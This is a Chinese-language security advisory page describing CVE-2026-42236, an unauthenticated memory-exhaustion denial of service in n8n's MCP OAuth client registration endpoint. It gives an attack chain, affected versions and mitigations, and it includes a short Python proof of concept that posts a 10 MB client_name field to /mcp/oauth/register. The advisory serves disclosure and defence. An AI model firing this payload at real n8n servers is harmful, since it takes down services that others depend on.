IPBUF安全漏洞报告
English
CVE-2026-42236 CVSS 7.5 高危

CVE-2026-42236 n8n资源耗尽漏洞

披露日期: 2026-05-04
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-42236
漏洞类型
拒绝服务
CVSS评分
7.5 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
n8n

相关标签

CVE-2026-42236n8nDoS资源耗尽未授权访问高危漏洞

漏洞概述

n8n开源工作流自动化平台在特定版本前存在严重漏洞。其MCP OAuth客户端注册端点接受未认证请求且缺乏资源控制,攻击者可发送大量数据耗尽服务器内存,导致服务不可用。即使关闭MCP功能,该端点仍可被访问。

技术细节

该漏洞的根本原因在于n8n工作流自动化平台的MCP OAuth客户端注册端点存在设计缺陷。在受影响版本中,该端点默认接受未经身份验证的远程请求,并且在处理和存储客户端数据时,未实施必要的内存资源分配限制。攻击者可以通过网络向该接口发送特制的、包含超大数据的恶意注册请求Payload。由于缺乏有效的校验机制,服务器在尝试处理并存储这些数据时会消耗大量内存资源。攻击者可通过重复发送此类请求或单次发送极大请求,迅速耗尽服务器可用内存,导致服务响应缓慢甚至完全崩溃,从而实现拒绝服务攻击。值得注意的是,即使管理员在界面中禁用了MCP功能,该注册端点仍然处于可访问状态,增加了攻击面。

攻击链分析

STEP 1
侦察
攻击者扫描网络,发现开放的n8n实例,并识别出MCP OAuth客户端注册端点(/mcp/oauth/register)。
STEP 2
利用
攻击者无需身份验证,向该端点发送包含巨大数据体的恶意POST请求(如超大JSON对象)。
STEP 3
资源耗尽
n8n服务器尝试接收并处理该请求,由于缺乏资源限制,服务器内存被迅速占用。
STEP 4
拒绝服务
服务器内存耗尽,导致n8n实例崩溃或无响应,正常用户无法访问工作流自动化服务。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target n8n instance MCP OAuth registration endpoint # The vulnerability allows unauthenticated requests to exhaust memory target_url = "http://<target-host>:5678/mcp/oauth/register" # Craft a large payload to trigger memory exhaustion # Sending a huge string in the client_name field malicious_payload = { "client_name": "A" * 10000000, # 10 MB of data "redirect_uris": ["http://localhost/callback"], "grant_types": ["authorization_code"] } headers = { "Content-Type": "application/json", "Accept": "application/json" } try: print(f"Sending attack payload to {target_url}...") response = requests.post(target_url, json=malicious_payload, headers=headers, timeout=30) print(f"Response Status Code: {response.status_code}") if response.status_code == 200 or response.status_code == 201: print("Payload accepted. Server memory may be exhausted.") else: print("Request completed.") except Exception as e: print(f"An error occurred (possible DoS success): {e}")

影响范围

n8n < 1.123.32
n8n >= 2.0.0 < 2.17.4
n8n >= 2.18.0 < 2.18.1

防御指南

临时缓解措施
建议立即将n8n升级至最新修复版本。如果暂时无法升级,应在反向代理(如Nginx)或防火墙层面对请求体大小进行严格限制,并阻断对外部对注册端点的直接访问,以缓解内存耗尽风险。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表